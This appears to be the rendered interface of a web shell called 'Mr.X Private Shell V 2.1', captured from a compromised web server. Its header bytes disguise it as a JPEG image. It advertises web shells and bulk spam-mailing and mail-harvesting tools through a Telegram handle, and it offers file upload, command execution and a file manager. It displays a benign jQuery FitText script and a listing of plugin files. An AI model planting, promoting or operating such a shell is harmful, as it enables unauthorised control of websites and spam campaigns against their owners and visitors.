����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
/*global jQuery, sowb */
/*!
 * FitText.js 1.2
 *
 * Copyright 2011, Dave Rupert http://daverupert.com
 * Released under the WTFPL license
 * http://sam.zoy.org/wtfpl/
 *
 * Date: Thu May 05 14:23:00 2011 -0600
 */
var sowb = window.sowb || {};

(function ($) {

    $.fn.fitText = function (kompressor, options) {

        // Setup options
        var compressor = kompressor || 1,
            settings = $.extend({
                'minFontSize': Number.NEGATIVE_INFINITY,
                'maxFontSize': Number.POSITIVE_INFINITY
            }, options);

        return this.each(function () {

            // Store the object
            var $this = $(this);

            // Resizer() resizes items based on the object width divided by the compressor * 10
            var resizer = function () {
                $this.css('font-size', Math.max(Math.min($this.width() / (compressor * 10), parseFloat(settings.maxFontSize)), parseFloat(settings.minFontSize)));
            };

            // Call once to set.
            resizer();

            // Call on resize. Opera debounces their resize by default.
            $(window).on('resize.fittext orientationchange.fittext', resizer);
			$( sowb ).on( 'setup_widgets', resizer );

        });
    };
})(jQuery);

jQuery( function( $ ){

    // Apply FitText to all Widgets Bundle FitText wrappers
	sowb.runFitText = function () {
		$( '.so-widget-fittext-wrapper' ).each( function() {
			var fitTextWrapper = $( this );
			if ( ! fitTextWrapper.is( ':visible' ) || fitTextWrapper.data( 'fitTextDone' ) ) {
				return fitTextWrapper;
			}

			var compressor = fitTextWrapper.data( 'fitTextCompressor' ) || 0.85;
			fitTextWrapper.find( 'h1,h2,h3,h4,h5,h6' ).each( function () {
				var $$ = $( this );
				$$.fitText( compressor, {
					minFontSize: '12px',
					maxFontSize: $$.css( 'font-size' )
				} );
			} );
			fitTextWrapper.data( 'fitTextDone', true );
			fitTextWrapper.trigger( 'fitTextDone' );
		});
	};

	$( window ).on( 'resize', sowb.runFitText );
	$( sowb ).on( 'setup_widgets', sowb.runFitText );

	sowb.runFitText();
} );

window.sowb = sowb;

Filemanager

Name Type Size Permission Actions
lib Folder 0755
slider Folder 0755
carousel.js File 12.58 KB 0644
carousel.min.js File 5.85 KB 0644
jquery.cycle.js File 52.81 KB 0644
jquery.cycle.min.js File 22.4 KB 0644
jquery.cycle.swipe.js File 2.95 KB 0644
jquery.cycle.swipe.min.js File 1.25 KB 0644
jquery.touchSwipe.js File 76.65 KB 0644
jquery.touchSwipe.min.js File 10.24 KB 0644
sow.google-map.js File 19.28 KB 0644
sow.google-map.min.js File 9.59 KB 0644
sow.jquery.fittext.js File 2.06 KB 0644
sow.jquery.fittext.min.js File 1.1 KB 0644